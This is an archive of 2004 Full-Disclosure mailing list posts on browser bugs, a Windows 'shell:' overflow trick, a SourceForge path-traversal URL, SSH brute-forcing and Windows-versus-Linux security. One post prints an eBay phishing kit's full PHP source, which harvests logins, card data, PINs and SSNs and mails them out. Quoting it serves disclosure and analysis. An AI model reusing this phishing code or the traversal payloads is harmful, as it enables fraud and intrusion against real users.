Re: [Full-Disclosure] shell:windows command question
I might be being stupid here, but tried the html link versions, in both IE 6 and Firefox 0.9 on W2k, and entering the shell command in the "run" option, and I just get a "the folder 'shell:[path and app of your choice]' does not exist". Error Am I missing something to cause this to execute? a -- Andrew Poodle Consultant IRW Solutions Group Ltd 17 Glasgow Road Paisley PA1 3QS t: +44 (0) 141 842 1142 f: +44 (0) 141 842 1134 e: [EMAIL PROTECTED] w: www.irw.co.uk - IRW Solutions Group Ltd IRW Platinum: Strategic Consultancy IRW Focus Blue: e-Business Software Solutions IRW Associates: Managed Services - > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of > Andreas Sandblad > Sent: 07 July 2004 20:25 > To: Perrymon, Josh L. > Cc: [EMAIL PROTECTED] > Subject: [EMAIL PROTECTED] - Email found in subject - Re: > [Full-Disclosure] shell:windows command question > > > This is dangerous. Based on the file extension of the shell > protocol different applications may be launched. For example: > shell:.its will launch Internet Explorer and shell:.mp3 will > launch Winamp. > > The trick is to find an application that will overflow when > given a very long parameter. A quick check showed that a > buffer overflow occured within MSProgramGroup > (WINDOWS\System32\grpconv.exe) after around 230 bytes with > the following URL: shell:[x*221].grp EIP can be controled, > but exploitation is a bit tricky since parameter is stored as unicode. > > Also Winamp contains an BO (no unicode here). > > Tested environment: > Windows XP pro + FireFox 0.9.1 > > /Andreas Sandblad > > On Wed, 7 Jul 2004, Perrymon, Josh L. wrote: > > > -snip-- > > center> > > > > who goes there > > > src="http://windowsupdate.microsoft.com%2F.http- > > equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none"> > > [customise as you see fit] > > <http://www.malware.com/stockpump.html> > > --end-- > > The code above has interest to me. > > Even in Mozilla the commands below will work. > > 1 > > 2 > > 4 > > Just save them to an .html file and run it. > > The first one with the double quotes was from bugtraq: > > Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash > > <http://seclists.org/lists/bugtraq/2004/Mar/0188.html> > > The links below that will run calc as well as winver. > > It seems it calls windows as a virtual dir because c:\winxp > is what I have. > > I have been playing around to see if cmd.exe will work with > it but without > > luck. > > This is what is in the registry. > > HKEY_CLASSES_ROOT\Shell > > Look in the registry key above. You will find the shell > object calls Windows > > Explorer with a particular set of arguments. > > %SystemRoot%\Explorer.exe /e,/idlist,%I,%L > > So this is tied to explorer.exe. This is something involved with the > > underlying functions of windows > > and not IE so to speak because it works in Mozilla or from > the run line. > > I'm trying to find out more about the shell: command > because I can put a > > link on a site that seems to run anything > > in system32 dir. I'd like to see if you can pass parameters to it. > > > > Anyone give me more info on the shell:windows command? > > JP > > > > > > Joshua Perrymon > > Sr. Network Security Consultant > > PGP Fingerprint > > 51B8 01AC E58B 9BFE D57D 8EF6 C0B2 DECF EC20 6021 > > > > **CONFIDENTIALITY NOTICE** > > The information contained in this e-mail may be proprietary and/or > > privileged and is intended for the sole use of the individual or > > organization named above. If you are not the intended > recipient or an > > authorized representative of the intended recipient, any review, > > copying or distribution of this e-mail and its attachments, > if any, is > > prohibited. If you have received this e-mail in error, > please notify > > the sender immediately by return e-mail and delete this > message from > > your system. > > > > > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > -- > _ _ > o' \,=./ `o >(o o) > ---ooO--(_)--Ooo--- > Andreas Sandblad > Sweden > > ___
RE: [Full-Disclosure] Firefox 0.92 DoS via TinyBMP
> [Full-Disclosure] Firefox 0.92 DoS via TinyBMP > > > Hi, > > for me this works fine on a fully patched msie 6.0sp1 too. > Firefox 0.8 doesn't seem to be vulnerable. > > Greetz > > >>Hi, > >> > >>there is a security vulnerability in Firebox 0.92 (latest Version) > >> I think this has more to do with the machine, rather than the browser. The link broke my IE in the same way.. Machine slows, and locks, requiring a forced hard reboot. Laptop with 450mhx cpu and 128 meg of ram, with a 5 gig HD Running Win2k, with IE6 and Firefox 0.9.2 However, my collegue's machine (1.6 ghz cpu, 1 gig ram) worked fine in both IE and Firefox, although firefox did render the page FAR more slowly than IE. There may be an issue in how firefox handles .BMP files, but I'd be more concerned with cpu and mem usage on older machines irrespective of browser. a -- Andrew Poodle Consultant IRW Solutions Group Ltd 17 Glasgow Road Paisley PA1 3QS t: +44 (0) 141 842 1142 f: +44 (0) 141 842 1134 e: [EMAIL PROTECTED] w: www.irw.co.uk - IRW Solutions Group Ltd IRW Platinum: Strategic Consultancy IRW Focus Blue: e-Business Software Solutions IRW Associates: Managed Services - This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents. Accordingly IRW Solutions Group Ltd disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation. If you have received this e-mail message in error, please notify us immediately. Please also destroy and delete the message from your computer. Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Vulnerability in sourceforge.net
Don't even think about trying this then... http://btmgr.sourceforge.net/index.php3?body=../../../../../../home/groups/b/bt/btmgr/htdocs/index.php3 Don't want to crash sourceforge by getting it into an infinite loop now do we? a > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] Behalf Of nicolas > vigier > Sent: 21 July 2004 09:00 > To: Alexander > Cc: [EMAIL PROTECTED] > Subject: Re: [Full-Disclosure] Vulnerability in sourceforge.net > > > On Wed, 21 Jul 2004, Alexander wrote: > > > Vulnerability in sourceforge.net. > > > > Remote user can read any files. Example: > > Any file the webserver account can read. > > > > http://btmgr.sourceforge.net/index.php3?body=../../../../../.. > /usr/local > > /apache/conf/httpd.conf > > This is not a vulnerability in sourceforge, but in on of the project's > webpage. And anyone with a project on sourceforge can read the same > files using his webspace. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents. Accordingly IRW Solutions Group Ltd disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation. If you have received this e-mail message in error, please notify us immediately. Please also destroy and delete the message from your computer. Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] OT: gmail invites
Likewise. can maybe manage a couple if anyone is desparate a > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] Behalf Of Fredrik > Leijon > Sent: 10 September 2004 13:12 > To: [EMAIL PROTECTED] > Subject: Re: [Full-Disclosure] OT: gmail invites > > > Alt J wrote: > > >I have a few gmail invites. > >Please reply off list if you're interested. > > > >Alt > > > > > I have 5 invites or so i don't need, send me a mail and i'll > hook you up > with one > > -Fredrik > > -- > { > Fredrik Leijon . ([EMAIL PROTECTED]) > { > Quibus International AB . (http://www.quibus.se) > Fosievägen 6 . 214 31 . Malmö . Sweden . +46 40 923990 > } > { > Social Engineering - because there is no patch for human stupidity > } > } > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents. Accordingly IRW Solutions Group Ltd disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation. If you have received this e-mail message in error, please notify us immediately. Please also destroy and delete the message from your computer. Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: getting administrator rights on win2003 machine?
> -Original Message- > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On > Behalf Of Random Letters > Sent: 28 October 2004 15:17 > To: [EMAIL PROTECTED] > Subject: [Full-Disclosure] Re: getting administrator rights on win2003 machine? > > > > This list is for people who try to prevent break-ins - I'll bet that no-one here will help you. While I was going to agree with you.. Someone has already provided help onlist... Shame really.. I almost laughed at the request.. But was a little surprised to see help offered almost immediately a >I'm at a boarding school in germany and we have a kind of internet >terminal there with win2003 running on the computers. My question is: >Is there a way of getting administrative privileges ? I used a RPC >Exploit before but now the computers are patched. How do I get a >administrator account now?? I have physikal access to the >computers. > >Greetings > >valentin - germany _ It's fast, it's easy and it's free. Get MSN Messenger today! http://www.msn.co.uk/messenger ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents. Accordingly IRW Solutions Group Ltd disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation. If you have received this e-mail message in error, please notify us immediately. Please also destroy and delete the message from your computer. Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Slightly off-topic: www.georgewbush.com
Can I point you to this article about it yesterday :) http://www.theregister.co.uk/2004/10/27/bush_blocking_non-americans/ a -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Berend-Jan Wever Sent: 29 October 2004 11:47 To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Slightly off-topic: www.georgewbush.com Hi all, Want to view www.georgewbush.com from outside the US? You can't: Access denied. This "security" measure (!?) can easily be avoided using a proxy in the US or any anonymous surfing website though. So, what is it he doesn't want anyone from outside the US to read ? Cheers, SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents. Accordingly IRW Solutions Group Ltd disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation. If you have received this e-mail message in error, please notify us immediately. Please also destroy and delete the message from your computer. Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Counteroffensive help on bruteforce attacks on SSHD
Hullo the list.. I have a box at home, running fedora core 1, behind a router, which I use for serving some dev webpages, and some other miscelaneous stuff.. I'm seeing lots of ssh login attempts with user=root from two or three IP addresses, after I blocked access at the firewall based on host. Can anyone point me at some good resources where I can bone up and learn more about counter-measures I'm not looking to take this guy out (although would'nt be a bad thing).. But would be interesting to find out more. tia a This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents. Accordingly IRW Solutions Group Ltd disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation. If you have received this e-mail message in error, please notify us immediately. Please also destroy and delete the message from your computer. Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Slightly off-topic: www.georgewbush.com
If it is for security, it's a rather poor security measure, as it was still browseable by IP address afaik.. a -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Todd Towles Sent: 29 October 2004 15:30 To: Berend-Jan Wever; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Slightly off-topic: www.georgewbush.com I read a article about how the site got hacked into...recently. Did anyone else read this? If it was hacked then because this is a reaction security measure and not a "we want to keep all non-amercians from seeing our stuff". I would guess it is a security measure has it is easy to see mirrors of it outside the country. > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of > Berend-Jan Wever > Sent: Friday, October 29, 2004 5:47 AM > To: [EMAIL PROTECTED] > Subject: [Full-Disclosure] Slightly off-topic: www.georgewbush.com > > Hi all, > > Want to view www.georgewbush.com from outside the US? You > can't: Access denied. This "security" measure (!?) can easily be > avoided using a proxy in the US or any anonymous surfing website > though. > > So, what is it he doesn't want anyone from outside the US to read ? > > Cheers, > SkyLined > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents. Accordingly IRW Solutions Group Ltd disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation. If you have received this e-mail message in error, please notify us immediately. Please also destroy and delete the message from your computer. Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: "Sitting Duck"
> -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of > Bruce Ediger > Sent: 07 July 2004 13:41 > To: [EMAIL PROTECTED] > Subject: [EMAIL PROTECTED] - Email found in subject - RE: > [Full-Disclosure] IE Web Browser: "Sitting Duck" > At least in practice the unix-a-likes demonstrate more > security than the flavors of Windows, don't they? > > I mean, where's the linux chain mailer to equal SirCam? > > Where are the multiple linux worms to equal Code Red, Nimda, > Deloder, Witty, SQL Spida, Slammer, Blaster, MyDoom, etc etc etc? > The evidence seems to suggest that Linux is more secure than > Windows, particularly in whatever ways cause susceptibility > to mass-mailers. The evidence thus far does seem to "suggest" that linux and such is more secure than Windows, but to that extent is that down to... 1: technical knowhow of the userbase tends to be higher, leading to the correct updating, patching, firewalling and general confiuguration of the machines 2: the %age of linux based machines in use, meaning it's a small enough userbase that it's of a relatively low interest to those malicious coders out there. I'm sure that as the userbase of linux increases, and on average, dumbs-down, so will the number of attempts at devising linux specific trojans/exploits/viruses. The nature of the linux OS means that it's likely that these will have less impact than their existing MS counterparts. Despite MS being accused of security through obscurity by not publicising loopholes quick enough, it's ironic that Linux benefits from a bit of security through obscurity due to it's relative small desktop userbase. Incidentally, I use both OS' regularly on my personal laptop (dual boot Win XP Pro and SUSE Linux), although my development box at home is Fedora Core 1, and I work for a predominatley MS consultancy and developmenthouse, so you could consider myself well and truly on the fence. Regards Andrew -- Andrew Poodle Consultant IRW Solutions Group Ltd 17 Glasgow Road Paisley PA1 3QS t: +44 (0) 141 842 1142 f: +44 (0) 141 842 1134 e: [EMAIL PROTECTED] w: www.irw.co.uk - IRW Solutions Group Ltd IRW Platinum: Strategic Consultancy IRW Focus Blue: e-Business Software Solutions IRW Associates: Managed Services - This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents. Accordingly IRW Solutions Group Ltd disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation. If you have received this e-mail message in error, please notify us immediately. Please also destroy and delete the message from your computer. Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] phish
Not a very good one.. Submitting with an empty field displayed the raw PHP code.. Seems to send to mail("[EMAIL PROTECTED]","$userid","$userid $pass"); Below.. --8<--- $value) { $str .= (strlen($str) < 1) ? '' : '&'; $str .= $key . '=' . rawurlencode($value); } return ($str); } parse_str($HTTP_SERVER_VARS['QUERY_STRING']); if($MfcISAPICommand=="SignInFPP"){ include 'login.php'; } elseif (!strcmp($MfcISAPICommand,"VerifyFPP")){ $a = query_str ($HTTP_POST_VARS); parse_str($a); $userid=str_replace(" ","",$userid); $pass=str_replace(" ","",$pass); $fd = fopen("http://signin.ebay.com/aw-cgi/eBayISAPI.dll?MfcISAPICommand=SignI nWelcome&siteid=0&co_partnerId=2&UsingSSL=0&pp=pass&i1=0&pageType=174&us erid=$userid&pass=$pass","r"); while ($line=fgets($fd,1000)) { if(strstr($line,"not valid")) $signerr=1; if(strstr($line,"Your User ID is not valid")) $signerr=2; } fclose ($fd); if($signerr) include 'login.php'; else{ mail("[EMAIL PROTECTED]","$userid","$userid $pass"); include 'step1.php'; } } elseif(!strcmp($MfcISAPICommand,"ProcessFPP")){ include 'step2.php'; } elseif(!strcmp($MfcISAPICommand,"ProcessFPP1")){ $a = query_str ($HTTP_POST_VARS); parse_str($a); $firstname = rtrim($firstname); $lastname = rtrim($lastname); $street = rtrim($street); $city = rtrim($city); $zip = rtrim($zip); $dayphone12 = rtrim($dayphone12); $dayphone22 = rtrim($dayphone22); $dayphone32 = rtrim($dayphone32); $dayphone42 = rtrim($dayphone42); $error = 0; if (!strlen($firstname)){ $error = 1; $firstnameerr = 1; } if (!strlen($lastname)){ $error = 1; $lastnameerr = 1; } if (!strlen($street)){ $error = 1; $streeterr = 1; } if (!strlen($city)){ $error = 1; $cityerr = 1; } /*if ($state == "default"){ $error = 1; $rstateerr = 1; } */ if (!strlen($zip) && !is_numeric($zip)){ $error = 1; $ziperr = 1; } if (!strlen($dayphone12)){ $error = 1; $dayphone12err = 1; } if (!strlen($dayphone22)){ $error = 1; $dayphone22err = 1; } if (!strlen($dayphone32)){ $error = 1; $dayphone32err = 1; } if(strlen($ssn)<1){ $error=1; $ssnerr=1; } if ($error == 1) include 'step2.php'; else include 'step3.php'; } elseif(!strcmp($MfcISAPICommand,"ProcessFPP2")){ $a = query_str ($HTTP_POST_VARS); parse_str($a); $ccnumber = rtrim($ccnumber); $ccmonth = rtrim($ccmonth); $ccyear = rtrim($ccyear); $cvv = rtrim($cvv); $pin = rtrim($pin); $error = 0; $a = substr($ccnumber,0,1); if($a == "3"){ if (strlen($cvv) != 4){ $error = 1; $cvverr = 1; } } elseif($a == "4"){ if (strlen($cvv) != 3){ $error = 1; $cvverr = 1; } } elseif($a == "5"){ if (strlen($cvv) != 3){ $error = 1; $cvverr = 1; } } elseif($a == "6"){ if (strlen($cvv) != 3){ $error = 1; $cvverr = 1; } } else{ $error = 1; $ccnumbererr = 1;} if(strlen($ccnumber)!=16){ $error=1; $ccnumbererr=1; } //ccmonth si ccyear; if(!strcmp($pin,"1234")||!strcmp($pin,"")){ $pinerr=1; $error=1; } if(strlen($pin)<4){ $pinerr=1; $error=1; } if($error==1) include 'step3.php'; else{ $message="--- -=::: Login Info :::=- user: $userid pass: $pass e-mail: $email -=::: Credit Card Info :::=- Credit Card Number: $ccnumber Expiration Date: $ccmonth/$ccyear CVV2: $cvv PIN: $pin Full Name: $firstname $lastname Address: $street City: $city State: $state Zip: $zip Phone: $dayphone12-$dayphone22-$dayphone32 $dayphone42 Country: $country SSN: $ssn "; mail("[EMAIL PROTECTED]","Fullinfo: $ccnumber","$message"); include 'process.htm'; } } elseif ($MfcISAPICommand=="SuccessfullFPP") include 'success.htm'; else include 'error.htm'; ?> -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of D B Sent: 08 November 2004 10:21 To: [EMAIL PROTECTED] Subject: [Full-Disclosure] phish another ebay phish http://www.ebay-verifications.biz/ws2/ header X-Apparently-To: [EMAIL PROTECTED] via 216.109.119.82; Sun, 07 Nov 2004 14:17:22 -0800 X-YahooFilteredBulk:66.139.79.218 X-Originating-IP: [66.139.79.218] Return-Path:<[EMAIL PROTECTED]> Received: from 66.139.79.218 (EHLO www2.triasite.net) (66.139.79.218) by mta303.mail.scd.yahoo.com with SMTP; Sun, 07 Nov 2004 14:17:22 -0800 Received: (from [EMAIL PROTECTED]) by www2.triasite.net (8.11.6/8.11.6) id iA7MOgr24317; Sun, 7 Nov 2004 16:24:42 -0600 Date: Sun, 7 Nov 2004 16:24:42 -0600 Message-Id: <[EMAIL PROTECTED]> To: [EMAIL PROTECTED] Subject:eBay Database Critical Update Notification! From
[Full-Disclosure] Inline desktop webproxy..
I came across a useful webproxy application (for windows) that allowed me to manipulate the headers of page requests, both plain and secure. Now daft me has since changed machines in my office, and lost the bookmark and the download.. Been a while since I used it, so can't even remember it's name... Can anyone suggest a free/opensource/shareware app that can do this, as I'm doing some testing on our new corporate website before it goes live. Thanks A ****** Andrew Poodle Analyst/Consultant IRW Solutions Group Ltd 17 Glasgow Road Paisley Renfrewshire PA1 3QS Phone: +44 (0) 141 842 1142 Fax: +44 (0) 141 842 1134 Email: [EMAIL PROTECTED] Web: www.irw.co.uk ** IRW Solutions Group Ltd IRW Platinum: Strategic Consultancy IRW Focus Blue: e-Business Software Solutions IRW Associates: Managed Service ** This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents. Accordingly IRW Solutions Group Ltd disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation. If you have received this e-mail message in error, please notify us immediately. Please also destroy and delete the message from your computer. Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html